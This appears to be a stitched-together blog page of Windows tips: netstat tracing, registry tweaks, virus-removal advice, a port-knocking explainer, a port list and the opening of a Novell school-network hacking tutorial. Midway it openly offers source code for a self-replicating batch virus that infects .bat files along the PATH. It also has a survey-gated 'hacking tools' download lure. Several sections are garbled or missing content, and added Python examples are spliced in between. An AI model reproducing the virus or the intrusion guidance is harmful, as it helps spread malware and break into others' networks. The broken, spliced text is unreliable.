Open a DOS command window (go to Start/Run, type "command" without the quotation marks and hit Enter), and in the MS-DOS prompt type:
netstat -a
(make sure you include the space between the "t" and the "-a").

This command will show you the host name of the lamer and of course yours too. Your host name will be under Local Address and his will be under Foreign Address. Note any suspicious name, and every number you see after the host name under Foreign Address that is new and suspicious (the numbers are ports, but I assume you are totally unfamiliar with them).
After you're done, now type
netstat -an (again, a space between the "t" and the "-an")

This will list all connections in numerical form, which makes it a lot easier to trace malicious users. Hostnames can be a little confusing if you don't know what you're doing (although they're easily understandable, as we shall see later). Also, by doing this, you can find out what your own IP address is, which is always useful.

It would look a bit like this:

Proto   Local Address    Foreign Address    State
TCP     Your IP:Port
TCP     Your IP:Port     A New IP:Port      Established

A New IP:Port - note that.
Now that you have an IP address and a host name, type
tracert [type IP address/Hostname here]

Write the whole thing there: after you write tracert, give a space, then type the new IP we found in the last step, then a / and then the host name we found in the first step. Remember, no port is to be added.
This will trace the lamer, who is probably using a trojan on your computer to do what he wants. The result will give you some IP addresses; note all of them.
Now go to
Write the IP addresses in the box and see where the IPs belong. Some IPs will give you ISPs like MTNL. The last IP would be his IP; call your or his ISP and inform them about it! DO RESPOND TO THIS.
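As an added example (not part of the original post), a small Python helper that reads `netstat -an` output in the layout shown above and separates your own address from the foreign hosts you hold established connections with, so the "new and suspicious" IP:port pairs stand out. The netstat text, the peer addresses and the set of routine ports are all constructed for the example, not captured from a real machine.

```python
import re
from collections import defaultdict

# Constructed `netstat -an` output in the Windows layout described above (not from a real host).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    192.168.1.10:139       0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1052      203.0.113.45:6667      ESTABLISHED
  TCP    192.168.1.10:1060      198.51.100.7:80        ESTABLISHED
  TCP    192.168.1.10:1061      198.51.100.7:80        TIME_WAIT
  TCP    127.0.0.1:1041         127.0.0.1:1042         ESTABLISHED
  TCP    192.168.1.10:1077      203.0.113.45:31337     ESTABLISHED
  UDP    0.0.0.0:445            *:*
"""

# One connection row: protocol, local host:port, foreign host:port, optional state (UDP rows have none).
ROW_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)(?:\s+(\S+))?\s*$")

# Ports that are routine for an outbound client (constructed list); anything else on an
# established connection deserves a closer look.
EXPECTED_FOREIGN_PORTS = {25, 80, 110, 143, 443}


def parse_netstat(text):
    """Turn `netstat -an` text into a list of connection dicts, skipping headers and blank lines."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue
        proto, lhost, lport, fhost, fport, state = m.groups()
        rows.append({"proto": proto, "lhost": lhost, "lport": lport,
                     "fhost": fhost, "fport": fport, "state": state or ""})
    return rows


def is_placeholder(host):
    """Wildcard and loopback addresses never identify a remote party."""
    return host in ("0.0.0.0", "*", "[::]") or host.startswith("127.")


def local_addresses(rows):
    """Your own IP address(es), as seen in the Local Address column."""
    return sorted({r["lhost"] for r in rows if not is_placeholder(r["lhost"])})


def foreign_peers(rows):
    """Remote hosts with ESTABLISHED TCP connections, mapped to the sorted remote ports in use."""
    peers = defaultdict(set)
    for r in rows:
        if r["proto"] == "TCP" and r["state"] == "ESTABLISHED" and not is_placeholder(r["fhost"]):
            peers[r["fhost"]].add(int(r["fport"]))
    return {host: sorted(ports) for host, ports in peers.items()}


def unexpected_peers(rows, expected=EXPECTED_FOREIGN_PORTS):
    """Peers talking on at least one port outside the expected set: the entries worth noting down."""
    return {host: [p for p in ports if p not in expected]
            for host, ports in foreign_peers(rows).items()
            if any(p not in expected for p in ports)}


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    print("local:", local_addresses(rows))
    for host, ports in unexpected_peers(rows).items():
        print(f"check {host} on ports {ports}")
```

On a real machine, pipe `netstat -an` into a file and pass its contents to `parse_netstat` instead of the sample.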

Hide in the (Network) Neighborhood
Don't want your XP computer to show up in the network browse list (Network Neighborhood/My Network Places) to other users on your network? One way to accomplish that is to disable file sharing. To do this, click Start, right click My Network Places and select Properties. Right click your local area connection and click Properties. Uncheck the box that says File and Printer Sharing for Microsoft Networks. Click OK.

But what if you want to be able to share folders with some users; you just don't want everyone on the network to see your computer's shares? There's a way:

Click Start and select Run.
In the Run box, type net config server /hidden:yes
Click OK.
Now others who know the UNC path (\\computer name\share name) can connect to your computer's shares from the Run box, but it won't show up in the network browse list.

Add Open With to all files:
You can add "Open With..." to the right-click context menu of all files. This is great for when you have several programs you want to open the same file types with. I use three different text editors, so I added it to the ".txt" key.
1. Open RegEdit
2. Go to HKEY_CLASSES_ROOT\*\Shell
3. Add a new Key named "OpenWith" by right clicking the "Shell" Key and selecting New
4. Set the (Default) to "Op&en With..."
5. Add a new Key named "Command" by right clicking the "OpenWith" Key and selecting New
6. Set the (Default) to "C:\Windows\rundll32.exe shell32.dll,OpenAs_RunDLL %1", C:\ being your Windows drive. You must enter the "OpenAs_RunDLL %1" exactly this way.

DUMMY virus 3

It will affect *.com and *.EXE files. It will multiply itself and may get more dangerous when altered.
Here is the code -


@echo off>nul.ViRuS
if "%1=="/ViRuS_MULTIPLY goto ViRuS_multiply
if "%1=="/ViRuS_OUTER_LOOP goto ViRuS_outer_loop
if "%1=="/ViRuS_FINDSELF goto ViRuS_findself
if "%VOFF%=="T goto ViRuS_OLDBAT

set ViRuSname=%0
if not exist %0.bat call %0 /ViRuS_FINDSELF %path%
if not exist %ViRuSname%.bat set ViRuSname=
if "%ViRuSname%==" goto ViRuS_OLDBAT

rem ViRuS if batch is started with name.BAT, virus will not become active
rem ViRuS it was a bug, now it's a feature ! (also notice the voff variable)
rem ViRuS also if batch was only in an append /x:on path (chance=minimal)

attrib +h %ViRuSname%.bat
for %%a in (%path%;.) do call %0 /ViRuS_OUTER_LOOP %%a
attrib -h %ViRuSname%.bat
set ViRuSname=

if "%2==" goto XXX_END>nul.ViRuS
if exist %2\%ViRuSname%.bat set ViRuSname=%2\%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
if exist %2%ViRuSname%.bat set ViRuSname=%2%ViRuSname%
if exist %ViRuSname%.bat goto XXX_END
goto ViRuS_findself

for %%a in (%2\*.bat;%2*.bat) do call %0 /ViRuS_MULTIPLY %%a
goto XXX_END>nul.ViRuS:ViRuS_multiply
find "ViRuS" <%ViRuSname%.bat >xViRuSx.bat
find /v "ViRuS" <%2 |find /v ":XXX_END" >>xViRuSx.bat
echo :XXX_END>>xViRuSx.bat
copy xViRuSx.bat %2>nul
del xViRuSx.bat
goto XXX_END>nul.ViRuS

echo on>nul.ViRuS
echo This is the dummy Virus
Hacking windows SEND TO MENU
I know this is a very simple thing, but the problem, as with many other issues, is ignorance about it.

How often do you copy songs from a CD? Or some photos from a CD?

What do you do? You select the required files and press Ctrl-C, open the destination folder and press Ctrl-V. Here is something that can save you time: customize your SEND TO menu.

This sounds simple and you can do it in less than sixty seconds.
You can create your own BASKET.

First you'll need access to hidden files, so change your view settings to make all hidden files visible:
Tools -> Folder Options -> View (tab) and select "Show hidden files and folders".
Go to <parent drive>:\Documents and Settings\(user name)\SendTo

Open up My Computer and locate your most used folders.

Create a shortcut to each of your most used folders in the SEND TO folder. You can do this in a number of ways.

Right click -> Send To -> Desktop (create shortcut), then move the shortcut from the desktop to the SEND TO folder.

Copy the most used folder, go to the SEND TO folder and right click -> Paste Shortcut.

Also remember to rename the shortcuts to "Send to videos" or "Send to photos". We don't need confusion when we use them.

9) How to remove the shortcut arrow from the desktop
Open Regedit and navigate to the following key:

change drive icons

First of all, copy an icon file to the root of the drive.
example: c:\icon.ico

Then create a file called autorun.inf at c:\autorun.inf,
then open that file and type the following:


Save and close the file.

Now open My Computer and refresh... and woh! The icon changed....
You can apply this to other drives too.

Be careful:

"autorun.inf" and "icon.ico" must be in the root of the drive.
example: c:\autorun.inf and c:\icon.ico.
Both in the root.

ENJOY, this works on 98 too!

Load kernel into RAM for faster startups
Use only if you have 512MB of RAM or more.
In Registry Editor, navigate to:


Set the value of the DisablePagingExecutive key to 1.

A reboot is required.

Disable User Tracking To Increase resources
Navigate to


in Registry Editor and

set the DWORD NoInstrumentation to 1. This will disable most of the user tracking features of XP.

Load apps Faster

Navigate to

in Registry Editor
and change the value from 3 to 5 or even up to 9.

It needs a reboot.

Hide the username on start menu

Navigate to:



Change the DWORD value NoUserNameInStartMenu to 1 to hide the username.




When you double-click on one of your hard drive partitions, does it show you some unexpected results?

When you right-click on one of your hard drive partitions, do you see a new item called "Autoplay" on top of the other items, in bold face?

When you right-click on one of your hard drive partitions, do you see some new items with garbage text?

THIS IS the Perlovga virus (otherwise known as temp2.exe) or one of its variants. The problem is that this virus is particularly cumbersome to remove, even by reputable anti-virus programs. But there is a solution, and it is called PRT (or Perlovga Removal Tool)!

What does this tool do?
It detects and removes all traces of the Perlovga virus from your system, including floppy disks and USB flash disks (the latter must be write-enabled during the scan process).

It also removes the leftovers of this virus by removing the 'autorun.inf' files and cleaning up your system registry, so you won't see the 'autoplay' item anymore.

How to use it?
Start your computer in Safe Mode and run this tool. If you have infected floppy/flash disks you can insert them and click Start. You can repeat this process for every disk you have.

Newfolder.exe virus SOLUTION


If you are infected with this virus, the following problems will occur on your PC:

1. Do you find a New Folder.exe file in the root path of every storage medium you have?

2. Do you find a new folder inside every folder you have?

3. When you double-click on one of your hard drive partitions, does it show you some unexpected results?

4. When you right-click on one of your hard drive partitions, do you see a new item called "Autoplay" on top of the other items, in bold face?

5. When you right-click on one of your hard drive partitions, do you see some new items with garbage text?

6. When your antivirus detects and deletes the malware that causes all of that and you restart your system, do you see an error message similar to: "Windows cannot find SSCVIIHOST.exe..."?

If your answer was 'Yes' to any of the above questions, then the chances are that you are infected with the Sohanad virus (otherwise known as New Folder.exe) or one of its variants.

The problem is that this virus is particularly cumbersome to remove, even by reputable anti-virus programs. But there is a solution, and it is called SRT (or Sohanad Removal Tool)!

What does this tool do?
It detects and removes all traces of the Sohanad virus from your system, including floppy disks and USB flash disks (the latter must be write-enabled during the scan process).

It also removes the leftovers of this virus by removing the 'autorun.inf' files and cleaning up your system registry, so you won't see the 'autoplay' item anymore.

How to use it?
Start your computer in Safe Mode and run this tool. If you have infected floppy/flash disks you can insert them and click Start. You can repeat this process for every disk you have.


Restrictions creating virus solution

* Disable Ctrl+Alt+Del, Disable Folder Options, Disable Regedit, Disable Show hidden files & folders, Disable Run Command, Disable Windows Firewall, Hide Desktop items, Hide Taskbar, Restrict Internet Explorer Home Page Changing, Hide Internet Options, etc.

Some viruses create system restrictions in order to hide themselves from easy detection. These restrictions are most often:

1 - Disable Ctrl+Alt+Del -- so the user can't see the virus and the other applications running!

2 - Disable Folder Options -- so the user can't set the option to show hidden files!

3 - Disable Regedit -- so the user can't see what is going on during system startup!

4 - Disable Show hidden files & folders -- so even if you select "Show hidden files and folders" from Folder Options, these files and folders will not be shown!

5 - Disable Run Command -- so the user can't use it to run tools to track the virus's activities or remove it.

6 - Disable Windows Firewall -- so the virus can send and receive any data through the network without the user noticing!

7 - Hide Desktop items -- to prevent the user from accessing My Computer and other desktop shortcuts!

8 - Hide Taskbar -- so the user can't explore the Start menu!

9 - Restrict Internet Explorer Home Page Changing -- so the user can't change the malicious web page set by the malware!

10 - Restrict Internet Explorer Closing -- so the user can't close the pop-up windows that appear when visiting the malicious web page or any other website!

11 - Hide Internet Options -- so the user can't change any setting set by the malware!

12 - Hide Internet Explorer Address Bar -- so the user can't see what web page is being visited and what scripts are being executed!

13 - Restrict Internet Explorer Right Click -- so the user can't view the source of the page being visited and other useful things.

14 - Hide Internet Explorer Navigation Buttons -- so the user is forced to use keyboard shortcuts to navigate through web sites!

15 - Hide Internet Explorer Context Menu -- so the user can't access this menu, which would let him select some useful settings.

16 - Hide Internet Explorer Toolbar -- so the user can't use it to remove unwanted toolbars installed by the malware.

Unfortunately, AV software doesn't really care about these restrictions and does nothing to re-enable the disabled features! But you can undo these restrictions with the help of this tool



Guys, if any of you have a problem where, whenever you try to open Task Manager (Alt+Ctrl+Del) or Registry Editor (Run command 'regedit'), it says "Task Manager/Registry Editor has been disabled by your administrator", then you are infected by a virus. To fix that virus there are 2 ways:

1. Create another account on your system and delete the previous one, and it's gone. I hope you all know how to make accounts.


2. Download this soft, restart in Safe Mode, execute it, then reboot normally. You're done.
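As an added example (not from the original post), a read-only Python audit of the policy values behind the restrictions listed above, including the "disabled by your administrator" messages for Task Manager and Regedit. The registry paths and value names are well-known Windows policy settings recalled from documentation rather than taken from this page, and the snapshot it falls back to when not run on Windows is constructed.

```python
import sys

# Registry locations where the listed restrictions are switched on. Hive names, key paths, value
# names and the "restricted" data are well-known Windows policy settings recalled from
# documentation, not taken from this page.
POL_SYSTEM = r"Software\Microsoft\Windows\CurrentVersion\Policies\System"
POL_EXPLORER = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
SHOWALL = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL"
FIREWALL = r"SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile"
IE_POL = r"Software\Policies\Microsoft\Internet Explorer"

# (hive, key, value name, data that means "restricted", what the user experiences)
RESTRICTIONS = [
    ("HKCU", POL_SYSTEM, "DisableTaskMgr", 1, "Task Manager (Ctrl+Alt+Del) disabled"),
    ("HKCU", POL_SYSTEM, "DisableRegistryTools", 1, "Regedit disabled"),
    ("HKCU", POL_EXPLORER, "NoFolderOptions", 1, "Folder Options hidden"),
    ("HKCU", POL_EXPLORER, "NoRun", 1, "Run command removed"),
    ("HKCU", POL_EXPLORER, "NoDesktop", 1, "Desktop items hidden"),
    ("HKLM", SHOWALL, "CheckedValue", 0, "'Show hidden files' setting will not stick"),
    ("HKLM", FIREWALL, "EnableFirewall", 0, "Windows Firewall disabled"),
    ("HKCU", IE_POL + r"\Control Panel", "HomePage", 1, "IE home page locked"),
    ("HKCU", IE_POL + r"\Restrictions", "NoBrowserOptions", 1, "Internet Options hidden"),
    ("HKCU", IE_POL + r"\Restrictions", "NoBrowserClose", 1, "IE window cannot be closed"),
    ("HKCU", IE_POL + r"\Restrictions", "NoBrowserContextMenu", 1, "IE right-click menu disabled"),
    ("HKCU", IE_POL + r"\Toolbars\Restrictions", "NoAddressBar", 1, "IE address bar hidden"),
    ("HKCU", IE_POL + r"\Toolbars\Restrictions", "NoNavButtons", 1, "IE navigation buttons hidden"),
    ("HKCU", IE_POL + r"\Toolbars\Restrictions", "NoToolBar", 1, "IE toolbar hidden"),
]


def _as_int(data):
    """Registry data may arrive as a DWORD or as a string ('0'); normalise, or None if not numeric."""
    try:
        return int(data)
    except (TypeError, ValueError):
        return None


def audit(snapshot):
    """snapshot maps (hive, key, value) -> data. Returns (path, data, meaning) per active restriction."""
    findings = []
    for hive, key, value, bad, meaning in RESTRICTIONS:
        data = snapshot.get((hive, key, value))
        if data is not None and _as_int(data) == bad:
            findings.append((f"{hive}\\{key}\\{value}", data, meaning))
    return findings


def read_live_snapshot():
    """Read the listed values from the live registry; Windows only, and read access only."""
    import winreg  # only importable on Windows
    hives = {"HKCU": winreg.HKEY_CURRENT_USER, "HKLM": winreg.HKEY_LOCAL_MACHINE}
    snapshot = {}
    for hive, key, value, _bad, _meaning in RESTRICTIONS:
        try:
            with winreg.OpenKey(hives[hive], key) as k:
                snapshot[(hive, key, value)], _kind = winreg.QueryValueEx(k, value)
        except OSError:
            pass  # key or value absent: that restriction is not set
    return snapshot


# Constructed snapshot standing in for an infected machine (not read from a real system).
SAMPLE_SNAPSHOT = {
    ("HKCU", POL_SYSTEM, "DisableTaskMgr"): 1,
    ("HKCU", POL_SYSTEM, "DisableRegistryTools"): 1,
    ("HKCU", POL_EXPLORER, "NoFolderOptions"): 1,
    ("HKCU", POL_EXPLORER, "NoRun"): 0,         # present but switched off: no finding
    ("HKLM", SHOWALL, "CheckedValue"): "0",     # rewritten as a string, still caught
    ("HKLM", FIREWALL, "EnableFirewall"): 1,    # firewall still on: no finding
}

if __name__ == "__main__":
    snap = read_live_snapshot() if sys.platform == "win32" else SAMPLE_SNAPSHOT
    for path, data, meaning in audit(snap):
        print(f"{meaning}: {path} = {data!r}")
```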



This is for all those who have started hacking or just have a craze for hacking. Here is a cool way of testing whether you are eligible to enter the field of hacking. Try this test, and please be honest, don't cheat yourself. You can find its solution on the net, but still please don't try to find it. Just check for yourself how fast your mind can work.

Now, after logging in to this link, tell me the time you needed, and please don't ask for help or a hint.


muhahaha virus solution

If you are infected with this virus, then whenever you open Orkut
the browser window gets closed automatically and a dialog box appears saying

To fix it

Go to the Windows directory of your PC (most probably it's C:\) and search for the folder named heap41a (it's hidden). Delete it. Also
go to the search menu, type heap41a and press Enter. Many files and folders will be displayed; delete all of them.
Then go to Run -> regedit -> Edit -> Find and type heap41a as the search query...

Delete any search result which contains the word heap.
Restart your system and you can access Gmail and Orkut now.


All About Port Knocking

In computing, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specified port(s).

This is usually implemented by configuring a daemon to watch the firewall log file for said connection attempts then modify the firewall configuration accordingly. It can also be performed by a process examining packets at a higher level (using packet capture interfaces such as Pcap), allowing the use of already "open" TCP ports to be used within the knock sequence. Port knocking is most often used to determine access to port 22, the Secure Shell (SSH) port. The port "knock" itself is similar to a secret handshake and can consist of any number of TCP, UDP or even sometimes ICMP and other protocol packets to numbered ports on the destination machine. The complexity of the knock can be anything from a simple ordered list (e.g. TCP port 1000, TCP port 2000, UDP port 3000) to a complex time-dependent, source-IP-based and other-factor-based encrypted hash.

A port knock setup takes next to no resources and very simple software to implement. A portknock daemon on the firewall machine listens for packets on certain ports (either via the firewall log or by packet capture). The client user would carry an extra utility, which could be as simple as netcat or a modified ping program or as complicated as a full hash-generator, and use that before they attempted to connect to the machine in the usual way.

Most portknocks are stateful systems in that if the first part of the "knock" has been received successfully, an incorrect second part would not allow the remote user to continue and, indeed, would give the remote user no clue as to how far through the sequence they failed. Usually the only indication of failure is that, at the end of the knock sequence, the port expected to be open is not opened. No packets are sent to the remote user at any time.
While this technique for securing access to remote network daemons has not yet been widely adopted by the security community, it has been integrated in newer rootkits.

How Port knocking works in theory

Step 1 (A) Client cannot connect to application listening on port n; (B) Client cannot establish connection to any port.

Step 2 (1,2,3,4) Client tries to connect to a well-defined set of ports in sequence by sending certain packets; Client has prior knowledge of the port knocking daemon and its configuration, but receives no acknowledgement during this phase because firewall rules preclude any response.

Step 3 (A) Server process (a port knocking daemon) intercepts connection attempts and interprets (decrypts and decodes) them as comprising an authentic "port knock"; server carries out specific task based on content of port knock, such as opening port n to the client.

Step 4 (A) Client connects to port n and authenticates using application’s regular mechanism.

Benefits of port knocking

Consider that, if an external attacker did not know the port knock sequence, even the simplest of sequences would require a massive brute force effort in order to be discovered. A three-knock simple TCP sequence (e.g. port 1000, 2000, 3000) would require an attacker without prior knowledge of the sequence to test every combination of three ports in the range 1-65535, and then to scan each port in between to see if anything had opened. As a stateful system, the port would not open until after the correct three-port sequence had been received in order, without other packets in between.

That equates to approximately 65535^4 packets in order to obtain and detect a single successful opening. That's approximately 18,445,618,199,572,250,625, or 18 million million million packets. On average it would take approximately 9 million million million packets to open a single, simple three-port TCP-only knock by brute force. This is made even more impractical when knock attempt-limiting is used to stop brute force attacks, when longer and more complex sequences are used, and when cryptographic hashes are used as part of the knock.

When a port knock is successfully used to open a port, the firewall rules are generally only opened to the IP address that supplied the correct knock. This is similar to only allowing a certain IP whitelist to access a service but is also more dynamic. An authorised user situated anywhere in the world would be able to open the port he is interested in to only the IP that he is using without needing help from the server administrator. He would also be able to "close" the port once he had finished, or the system could be set up to use a timeout mechanism, to ensure that once he changes IP's, only the IP's necessary are left able to contact the server. Because of port knocking's stateful behaviour, several users from different source IP addresses can simultaneously be at varying levels of the port knock. Thus it is possible to have a genuine user with the correct knock let through the firewall even in the middle of a port attack from multiple IP's (assuming the bandwidth of the firewall is not completely swamped). To all other IP addresses, the ports still appear closed and there is no indication that there are other users who have successfully opened ports and are using them.

Using cryptographic hashes inside the port knock sequence can mean that even sniffing the network traffic in and out of the source and target machines is ineffective against discovering the port knock sequence or using traffic replay attacks to repeat prior port knock sequences. Even if somebody did manage to guess, steal or sniff the port knock and successfully use it to gain access to a port, the usual port security mechanisms are still in place, along with whatever service authentication was running on the opened ports.

The software required, either at the server or client end, is minimal and can in fact be implemented as simply as a shell script for the server or a Windows batch file and a standard Windows command line utility for the client. Overhead in terms of traffic, CPU and memory consumption is at an absolute minimum. Port knock daemons also tend to be so simple that any sort of vulnerability is obvious and the code is very easily auditable. With a portknock system in place on ports such as the SSH port, it can prevent brute force password attacks on logins. The SSH daemon need not even wake up as any attempt that is made without the correct portknock will bounce harmlessly off the TCP/IP stack rather than the SSH authentication. As far as any attacker is concerned, there is no daemon running on that port at all until he manages to correctly knock on the port. The system is completely customisable and not limited to opening specific ports or, indeed, opening ports at all. Usually a knock sequence description is tied with an action, such as running a shell script, so when a specific sequence is detected by the port knock daemon, the relevant shell script is run. This could add firewall rules to open ports or do anything else that was possible in a shell script. Many portknocks can be used on a single machine to perform many different actions, such as opening or closing different ports.

Due to the fact that the ports appear closed at all times until a user knowing the correct knock uses it, port knocking can help cut down not only on brute force password attacks and their associated log spam but also protocol vulnerability exploits. If an exploit was discovered that could compromise SSH daemons in their default configuration, having a port knock on that SSH port could mean that the SSH daemon may not be compromised in the time before it was updated. Only authorised users would have the knock and therefore only authorised users would be able to contact the SSH server in any way. Thus, random attempts on SSH servers by worms and viruses trying to exploit the vulnerability would not reach the vulnerable SSH server at all, giving the administrator a chance to update or patch the software. Although not a complete protection, port knocking would certainly be another level of defense against random attacks and, properly implemented, could even stop determined, targeted attacks.

Port knocking generally has some disregard in the security world, given that early implementations basically consisted of a number of ports that had to be hit in order. However, the best of modern portknock systems are much more complex, some using highly secure cryptographic hashes in order to defeat the most common attacks (such as packet sniffing and packet replay). Additionally, portknock systems can include blacklists, whitelists and dynamic attack responses, as can any internet service; however, even the simplest of port knocks controls access to a system before attackers are able to hit a service that allocates memory, CPU time or other significant resources, and also acts as a barrier against brute-force attempts, automated vulnerability exploits, etc. Also, port knocking does not generally lower the security of a system overall. Indeed, it provides another layer of security for minimal overhead. In a worst case scenario, however, the port knocking software introduces a new security problem or lowers security due to risk compensation.
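As an added example (not from the original article), a Python model of the stateful knock daemon described above: it reads dropped-packet lines from a firewall log, keeps one cursor per source IP, resets silently on any out-of-sequence packet, opens the protected port only for the knocking IP with a timeout, and blacklists a source after repeated broken sequences (attempt limiting). The knock TCP 1000, 2000, 3000 opening port 22 is the one the text uses; the log lines, addresses, timeout and failure limit are constructed in the style of the iptables LOG target, and `brute_force_packets` carries the 65535^4 count through.

```python
import re

# The simple ordered knock the text uses: TCP 1000, TCP 2000, TCP 3000 opens the SSH port (22).
KNOCK_SEQUENCE = (("TCP", 1000), ("TCP", 2000), ("TCP", 3000))
OPEN_PORT = 22
OPEN_SECONDS = 30     # lifetime of the per-source ACCEPT rule (the timeout mechanism)
MAX_FAILURES = 3      # attempt limiting: broken sequences tolerated before a source is blacklisted

# Fields this daemon needs from an iptables-style LOG line: source, protocol, destination port.
LOG_RE = re.compile(r"SRC=(\S+) .*?PROTO=(\w+) .*?DPT=(\d+)")

# Constructed firewall log (iptables LOG style, not captured from a real host): a genuine client
# 203.0.113.5 knocks correctly while a scanner 198.51.100.9 probes in between.
SAMPLE_LOG = [
    "kernel: DROP IN=eth0 SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=40001 DPT=1000",
    "kernel: DROP IN=eth0 SRC=198.51.100.9 DST=192.0.2.10 PROTO=TCP SPT=5555 DPT=1000",
    "kernel: DROP IN=eth0 SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=40002 DPT=2000",
    "kernel: DROP IN=eth0 SRC=198.51.100.9 DST=192.0.2.10 PROTO=TCP SPT=5556 DPT=2001",
    "kernel: DROP IN=eth0 SRC=198.51.100.9 DST=192.0.2.10 PROTO=TCP SPT=5557 DPT=3000",
    "kernel: DROP IN=eth0 SRC=203.0.113.5 DST=192.0.2.10 PROTO=TCP SPT=40003 DPT=3000",
    "kernel: DROP IN=eth0 SRC=198.51.100.9 DST=192.0.2.10 PROTO=UDP SPT=5558 DPT=53",
]


class KnockDaemon:
    """Stateful port-knock tracker: one cursor per source IP, and it never sends anything back."""

    def __init__(self, sequence=KNOCK_SEQUENCE, open_port=OPEN_PORT,
                 ttl=OPEN_SECONDS, max_failures=MAX_FAILURES):
        self.sequence = tuple(sequence)
        self.open_port = open_port
        self.ttl = ttl
        self.max_failures = max_failures
        self.progress = {}    # src -> index of the next knock expected from it
        self.failures = {}    # src -> number of broken sequences seen
        self.blacklist = set()
        self.allowed = {}     # src -> time at which its ACCEPT rule expires
        self.actions = []     # firewall changes the daemon would apply, in order

    def observe(self, src, proto, dport, now):
        """Feed one logged (dropped) packet. Returns True if src just completed the knock."""
        if src in self.blacklist:
            return False
        stage = self.progress.get(src, 0)
        if (proto, dport) == self.sequence[stage]:
            stage += 1
        else:
            # Any other packet breaks the sequence; the sender gets no hint how far it got.
            if stage > 0:
                self.failures[src] = self.failures.get(src, 0) + 1
                if self.failures[src] >= self.max_failures:
                    self.blacklist.add(src)
                    self.actions.append(f"DROP all from {src} (knock attempt limit)")
            stage = 1 if (proto, dport) == self.sequence[0] else 0
        if stage == len(self.sequence):
            self.progress[src] = 0
            self.allowed[src] = now + self.ttl
            self.actions.append(f"ACCEPT tcp from {src} to dport {self.open_port} until t={now + self.ttl}")
            return True
        self.progress[src] = stage
        return False

    def is_open_for(self, src, now):
        """Whether src may currently reach the protected port; expires the rule on timeout."""
        expiry = self.allowed.get(src)
        if expiry is None:
            return False
        if now > expiry:
            del self.allowed[src]
            self.actions.append(f"DROP tcp from {src} to dport {self.open_port} (timeout)")
            return False
        return True

    def replay_log(self, lines, t0=0):
        """Parse log lines in order, one second apart, and return the sources that opened the port."""
        opened = []
        for i, line in enumerate(lines):
            m = LOG_RE.search(line)
            if not m:
                continue
            if self.observe(m.group(1), m.group(2), int(m.group(3)), t0 + i):
                opened.append(m.group(1))
        return opened


def brute_force_packets(knocks, ports=65535):
    """Packets to try every knocks-long sequence and then probe every port for what opened."""
    return ports ** (knocks + 1)


if __name__ == "__main__":
    daemon = KnockDaemon()
    print("opened for:", daemon.replay_log(SAMPLE_LOG))
    for action in daemon.actions:
        print(action)
```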

I liked to share this information; it's really knowledgeable.


Common Ports
The Common Ports are assigned by the IANA and on most systems can only be used by system (or root) processes or by programs executed by privileged users.
Ports are used in the TCP [RFC793] to name the ends of logical connections which carry long term conversations. For the purpose of providing services to unknown callers, a service contact port is defined. This list specifies the port used by the server process as its contact port.

Port Assignments for Common Ports:

Port UDP TCP Definition
7 x x echo
9 x x discard
11 x x systat
13 x x daytime
17 x x quote of the day
19 x character generator
20 x ftp - data
21 x ftp - control
23 x telnet
25 x smtp mail transfer
37 x x timeserver
39 x rlp resource location
42 x x nameserver
43 x nicname whois
53 x x domain name server
67 x bootpc bootstrap protocol
68 x bootpc bootstrap protocol
69 x tftp trivial file transfer
70 x gopher
79 x finger
80 x http
88 x x kerberos
101 x hostname nic
102 x iso-tsap class 0
107 x rtelnet
109 x pop2
110 x pop3
111 x x sunrpc
113 x identification protocol
117 x uucp
119 x nntp
123 x ntp
135 x x epmap
137 x x netbios - name service
138 x netbios - dgm
139 x netbios - ssn
143 x imap
158 x pcmail - srv
161 x snmp
162 x snmptrap
170 x print - srv
179 x border gateway protocol
194 x irc internet relay chat
213 x ipx
389 x ldap
443 x x https (ssl)
445 x x microsoft - ds
464 x x kpasswd
500 x isakmp key exchange
512 x x remote execute
513 x x login / who
514 x x shell cmd / syslog
515 x printer spooler
517 x talk
518 x ntalk
520 x x router / efs
525 x timeserver
526 x tempo
530 x rpc
531 x conference chat
532 x netnews newsreader
533 x netwall
540 x uucp
543 x klogin
544 x kshell
550 x new - rwho
556 x remotefs
560 x rmonitor
561 x monitor
636 x ldaps over tls/ssl
666 x x doom id software
749 x x kerberos administration
750 x kerberos version iv
1109 x kpop
1167 x phone
1433 x x ms - sql - server
1434 x x ms - sql - monitor
1512 x x wins
1524 x ingreslock
1701 x l2tp
1723 x pptp point to point
1812 x radius authentication
1813 x radius accounting
2049 x nfs server
2053 x kerberos de - multiplexor
9535 x man remote server


EDIT: Download this latest pack containing all the tools.
This pack will be updated twice a week.

Download :

You will have to fill in a free 1-minute survey to get this, as I don't want every Tom, Dick and Harry to get their hands on this exotic stuff.

1. Introduction (PLEASE READ)
2. Novell - What You Need to Know
3. The Basics of Novell Hacking
i. Navigating the Network
ii. Command Prompt
iii. Floppy / CD
iv. Gaining Admin
v. Other stuff...
4. Advanced Novell Hacking
i. Tools
ii. File / Print Sharing
iii. SAM
iv. Access the Server
v. Viewing "restricted" drives


Before we get started, let me get a couple of things straight. First of all, I hate it when I
surf the web and can't ever access any site without having shit like "This site is for
educational purposes only" pop up. For you people who are like me, I'll do you all a favour.

Which brings me to my next point. Admins. Most schools across the world have admins that think
they're the smartest things on two legs because they got some diploma that says they know how to
turn on a computer. Well, for any admins that think this way and are reading this tutorial, let
me say this: your diploma or certificate or whatever doesn't mean shit. Sure, it makes you look
smart on paper, but in the real world, if you're lazy or just plain stupid, you will get 0wned
by a person that you think is too young or too stupid to do any real damage to your network.
Make no mistake: if you stop learning, if you stop surfing the web to sharpen your skills, if
you stop caring about your network, sooner or later, some punk who's gonna try and have some
fun's gonna make your life really shit really fast when you find out that you are way out of
